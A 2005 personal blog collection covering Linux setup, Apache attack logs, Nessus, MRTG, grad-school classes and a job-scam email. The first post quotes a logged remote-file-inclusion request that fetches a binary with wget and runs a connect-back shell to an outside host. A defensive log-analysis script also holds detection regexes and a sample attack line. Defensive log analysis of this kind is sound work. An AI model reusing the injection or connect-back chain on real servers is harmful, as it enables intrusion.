Wednesday, November 30, 2005

Script Kiddies attack my Linux/Apache box

I am seeing attacks on popular open-source software that runs on Linux, e.g.

129.27.140.4 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://148.81.141.12/cmd.gif?&cmd=cd%20/tmp;wget%20
131.155.98.128/cback;chmod%20744%20cback;./cback%20
194.112.220.37%208080;echo%20YYY;echo| 
HTTP/1.1" 404 293 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"


(I have broken the line up to fit. It's one entry, or request, from my Apache 2.0 log file. It's a Fedora Core 4 install, mostly default.)

These are slightly more complex attacks, and they show the difficulty of tracking down your attacker. The requester, 129.27.140.4, tracks here: optikom2.inw.tu-graz.ac.at -- the Graz University of Technology in Austria. But the request is calling a script from here: lilo.pjwstk.edu.pl, the POLSKO-JAPONSKA WYZSZA SZKOLA TECHNIK KOMPUTEROWYCH in Poland. It uses more code from here: pc01.irce.tue.nl, someone's computer in the Netherlands. Finally, it looks like this server gets notified: 194.112.220.37, www.lbsschrems.at, WVNET Information und Kommunikation GmbH, someone's server in Austria. That server is running phpGroupWare, and has probably already been compromised and is now being used to compromise other machines. You could check for bugs in phpGroupWare, but their server's down.

The code here,
http://131.155.98.128/cback, appears to be something in C that requires some include files. The initial script, here:
http://148.81.141.12/cmd.gif is a defacement script. Note that it doesn't open in Netscape -- just IE.

<!-- Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com if you are going to modify the code, please keep the names of its original authors and please get in touch with me... hey folks, seriously, there are a lot of bastards who simply use it; don't be just a sucker of the script, don't be an imbecile lamer, don't be a shitty script kiddie, don't be a jerk, help improve it too!! -->

At least our script writer left us his email address. He just wrote the code, of course; he's not the one trying to use it to deface a site. Right. There were additional lines in my Apache log file that showed attacks against other applications (not installed on my box): WordPress, phpGroupWare, Drupal and AWStats. What weakness do these applications have in common? XML-RPC on PHP.

It looks like Apache needs a tool similar to Windows/IIS's urlscan, which prevents attacks like these from getting to the webserver in the first place. These attacks are increasingly common, but there are no newspaper headlines, as there were for attacks that took advantage of Microsoft vulnerabilities. These don't attack a single product, but holes in applications that are built on the ability to run things at the command line from a web request. It makes for great functionality and weak security.



Weak web applications may mean your firewall is really just a router for port 80 traffic.



Tuesday, November 29, 2005

A New Attack

Just when I was running out of memory to run my new photo gallery (Gallery 2),
I checked my log files to see what was causing some issues for me. It
turns out that Gallery2 and SELinux do not get along so well, but if
you edit your policy files, it can be made to work.



The new attack:

195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"


195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /mysql/main.php HTTP/1.0" 404 291 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /dbadmin/main.php HTTP/1.0" 404 293 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /db/main.php HTTP/1.0" 404 288 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 300 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/pma/main.php HTTP/1.0" 404 295 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 302 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/mysql/main.php HTTP/1.0" 404 297 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /mysql-admin/main.php HTTP/1.0" 404 297 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpmyadmin2/main.php HTTP/1.0" 404 297 "-" "pmafind"


195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 302 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 302 "-" "pmafind"




Apparently, there's a new tool out called "pmafind" looking for
phpmyadmin installs. I hadn't seen this one before. I guess enough
people have phpmyadmin installed in some unprotected directory to make
this worthwhile.
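A small log analyser for the two patterns in these two posts (a command chain smuggled through a URL parameter, and a scanner like "pmafind" guessing admin paths in a few seconds), added here as an example and not code from the original blog. It parses Apache combined-format lines; the sample lines are constructed in the style quoted above with documentation IPs, and the two regexes are heuristics I chose, not any product's signatures:

```python
import re
from datetime import datetime
# Apache "combined" log format, the layout of the entries quoted in these posts.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Heuristics on the request path: a URL where a file path is expected (RFI), and shell tokens chained with ';'.
RFI_RE = re.compile(r'=(?:https?|ftp)://', re.I)
SHELL_RE = re.compile(r'(?:=|%20|;)(?:cd|wget|chmod|curl|perl|sh)(?:%20|;|$)', re.I)

def parse(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["status"] = int(d["status"])
    return d

def flag_injection(entry):
    """Return a reason string if the request looks like RFI / command injection, else None."""
    if RFI_RE.search(entry["path"]):
        return "url-in-parameter"
    return "shell-command-in-query" if SHELL_RE.search(entry["path"]) else None

def find_scanners(entries, min_paths=5, window_s=60):
    """Source IPs that 404'd on at least min_paths distinct paths inside any window_s-second span."""
    by_ip = {}
    for e in (e for e in entries if e["status"] == 404):
        by_ip.setdefault(e["ip"], []).append((e["ts"], e["path"]))
    result = {}
    for ip, hits in by_ip.items():
        hits.sort()
        best = max(len({p for t, p in hits[i:] if (t - hits[i][0]).total_seconds() <= window_s})
                   for i in range(len(hits)))
        if best >= min_paths:
            result[ip] = best
    return result

def analyse(lines):
    """Return ([(ip, reason)] for injection attempts, {ip: distinct 404 paths} for scanners)."""
    entries = [e for e in map(parse, lines) if e]
    return [(e["ip"], flag_injection(e)) for e in entries if flag_injection(e)], find_scanners(entries)

# Constructed sample lines in the style of the posts (documentation IPs, not the real ones).
SAMPLE = [
    '192.0.2.10 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?option=com_content&mosConfig_'
    'absolute_path=http://203.0.113.5/cmd.gif?&cmd=cd%20/tmp;wget%20203.0.113.6/x HTTP/1.1" 404 293 "-" "Mozilla/4.0"',
] + ['198.51.100.7 - - [28/Nov/2005:20:06:%02d -0500] "GET /%s/main.php HTTP/1.0" 404 290 "-" "pmafind"'
     % (41 + i // 3, p) for i, p in enumerate(["phpmyadmin", "PMA", "admin", "mysql", "dbadmin", "db"])]
```

Running analyse() over a real access_log gives one list of suspicious requests and one map of path-guessing sources; a single 404 from an address is never counted as scanning.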



More attacks to come...


Monday, November 21, 2005

Red Hat vs. Mandrake

I grew tired of updating every package that came with Mandrake. The
most frustrating part was either not finding what I needed to install, or
installing it only to have configure fail to find it.




I re-downloaded Fedora Core 4 in the DVD image, burned it on the Mac.
Macs can open, create and burn ISO images using the standard Disk Tools
utility. I checked the sha1sum on the Linux box that was the FTP
staging area, because OS X doesn't seem to have a sha1sum utility, and
I didn't feel like spending time downloading, configuring and
installing one. CuteFTP balked at downloading a 2.6 GB file, too,
insisting that there wasn't space on my hard disk for it, even though
there was plenty of space. Once again, Linux command line to the rescue.




Red Hat is now installed on my antique Inspiron 7500, and it's not
perfect yet -- I'm still working on the display. But much more software
works without endless download, configure, make, make install cycles....



Friday, November 18, 2005

Nessus: Security Scanning on Linux and Windows

There are some great tools available for Linux. Unfortunately, a lot of people don't use them for a variety of reasons. They don't understand Linux, and there's no standard interface on Linux, except for the über-powerful command line. (I'm still annoyed that most distributions set the default boot to the GUI.)


Nessus is one of those tools. It installs easily from the command line and it has a friendly setup script. Once you complete it, you can start the Nessus server on your Linux box. Someone has even written a friendly Windows client for Nessus, so you can control your scans from Windows.


What's the point? Nessus is a powerful security scanner/vulnerability finder that probably matches most of what's on the market. It stores results to a database (or databases), has a diff feature so you can easily track changes over time, and has a great number of options. It has nearly 10,000 plugins to run platform-specific attacks, and it does a good job of OS fingerprinting.


So I continue experimenting with Nessus, of course, on my own systems. I can have a Nessus scan against my firewall open in one window and I can watch my firewall logs in another. (Remote syslog is cool. Who knew that even cheap routers can log to syslog?)


Competing products have sexier interfaces and reports, but they cost a lot more.



Monday, November 14, 2005

MRTG, Linksys, Linux and Apache

I have put my Linux box to good use, installing MRTG and monitoring the bandwidth usage of my router. It turned out to be a little less simple than I thought, and I also bricked my old Linksys router. The Linksys BEFVP41 v.1 had SNMP and access log sending. Its first replacement, the BEFVP41 v.2 has access log sending but no SNMP. Thus I'm up to a Netopia R9100 that was lying around, which has SNMP, but remote syslog for router activity only.


I also bought a nice new Linksys WRT54GS v.3, which I have modded with a couple of different custom firmware developments. So far, the DD-WRT has some stability issues, so I'm still trying to choose.


What I really want is a complete access log that I can check for patterns. I want to be able to see all the traffic hitting my external interface. Do I really have to buy something like a Watchguard X5 to do this?



I also figured out how to do remote syslog after some vexation. There are actually two syslog configuration files, one in /etc and the other in /etc/sysconfig. (The man pages fail to mention the difference...) With the localx config in /etc and the -r option in /etc/sysconfig, my router (Netopia R9100) now logs all firewall violations to /var/log/router.log . Sweet. Now I just need something to parse it, although it's interesting to just keep a tail -f open.



Friday, November 11, 2005

Progress

Back in the old days, (1990s) I had ISDN at home. It was the fastest bandwidth available, and it afforded me voice and fax and data all in one interface. (ISDN-BRI, with two B channels and one D channel for signalling, if you get technical.) Billing was awful. I paid two cents a minute per B channel during peak hours, and it took some tweaking to get it down. (Windows really does broadcast every eleven minutes, and that would bring up the data at two cents a minute.) Needless to say, I stayed up late at night to do large downloads.

I have gone through DSL and now I have cable at about 5 Megabits per second. I just downloaded Fedora Core 4 (Redhat's free testbed) and installed it on an old P3 system I have here. Fedora Core 4 is 4 CDs, about 650 MB each. I had some trouble with the media checking, and the SHA-1 checks didn't check out, so I had to download them all again.

All in all, I think I downloaded over 5 GB of data over the past 24 hours. Back in 1998, this would have been unthinkable. Back then, you had to order the CDs, wait for them to arrive, and then install it. And installing Redhat 5.x, you had to know the IRQs and DMAs and which chip set your NIC had (I started hoarding DEC Tulip cards). Today, Redhat (and the other Linuxes) load up all my hardware automatically. I don't have to know anything about my hardware.

And the new linuxes have nice GUIs that launch by default. To log in at runlevel 3, you need to tweak inittab. And VI has now been replaced with VIM.

All I wanted was a command line interface like I'm used to.

CS vs. IS vs. IT

Computer Science and Information Systems are fundamentally different. In Information Systems, we might be able to use a more efficient compression algorithm, but unless the business rules call for it, we don't care. IS is about management of business rules and processes, although some CS folks seem to think it's just a survey of computer science for people who can't do calculus. We actually end up doing calculus for project management to predict what our chances are of finishing a project on time. IS also covers organizational behavior.


I come from an Information Technology background. When I started talking about IT in an IS context, my professors quickly corrected me. Technology -- whatever it is -- should support business processes. Where technology can transform an organization is where IS fits in. Servers, routers, switches, and software are what you build IS implementations on. IS covers transaction support systems, management information systems, and decision support systems. IS is part of the business school; CS is part of the engineering school. IT is taught at vo-tech schools.


IS is why restaurants serve hamburgers with a pound of beef. By analyzing restaurant ordering system logs, it became apparent that giant burgers bring customers in and make more money for the restaurant chain. Computer scientists can write the DBMS that holds the data, and IT people can manage the hardware and the software, but the IS people design the system.


So when people start lumping everything together, IT/IS/CS, they are covering a lot of different areas. Some even talk about a degree in IT, which doesn't exist, at least not until Microsoft creates its own university. (Which McDonald's has.)



Tuesday, November 8, 2005

All Classes will be on Wednesdays this Spring.

I just registered for the spring semester. All classes I need are on Wednesday evening, so I will be in class from 6pm until 10pm.
Wednesday:
Computerized Decision Systems - MGT 226 10
Database Systems - MGT 284 10
Monday: (my elective)
Topics in Higher Level Languages (Java) - MGT 283 10
I wasn't planning on a higher level language this spring, much less Java, but the professor has her own book on object oriented programming using Java, so it's hard to resist. Maybe I'll learn something.

All the other electives I wanted to take were also on Wednesday evening.

Job Fraud

With so many people using the Internet to look for new and better jobs, a new Internet scam has begun. I keep getting emails like this:


Your resume came to us through one of our partners and we would like to set an appointment to meet with you. Albert & Alexander Associates helps direct senior executives and managers to the best jobs in the Washington DC area. We steward our clients careers, maximizing their earning potential and job satisfaction.
If you are interested in learning more, please visit  (link)
and complete our assessment. Someone will contact you shortly if we feel we can be of assistance.
Best Regards,
Albert & Alexander Associates



This is different from other, legitimate job emails from companies and recruiters I would love to work with. These guys are like Bernard Haldane, who have been caught ripping job seekers off with the promise of uncovering the "secret job market." The saddest parts are the misspellings in the subject line: "We recieved your resume" and how the return address ( washingtoncareers@gmail.com ) doesn't work. So Monster-résumé-posters beware, there is a new way for scam artists to find you. What makes this suspicious?



  • There's no specific job listed.

  • No pre-screen questions: US citizen, clearance, how much $ you want.

  • The "assessment" requires your salary from every job on your résumé.

  • Lack of specifics.

  • Lack of contactability of recruiters. The real recruiters I've spoken with are efficient, polite, and quick to respond.

  • Return email is a gmail address, even though this outfit has its own domain.


Object Oriented Development

Everybody keeps asking me what they teach in Information Systems grad school, so I'm going to start discussing it here.

Basically, we're still learning System Development Lifecycle, in several different forms. Structured, Rapid Application Development, Extreme (Xtreme!) Programming, and finally Object-Oriented.

Object Oriented is not just a higher-level language any more. It's a whole development method with its own techniques, tools and diagrams. These diagrams, more or less, replace dataflow diagrams and entity relationship diagrams, although I think every database should have a good ERD.

Some of my classmates were still confused and/or thought OO development is a fad. It slowed class up a little. A fair misunderstanding is the database side. What's an object oriented database? Well, we're not really sure yet. OO programming still uses databases -- traditional databases. From the diagrams and textbook, this wasn't clear, leading to the question, "Where does the data go if you turn the system off?"

It's still there, in a database, just like in the structured approach.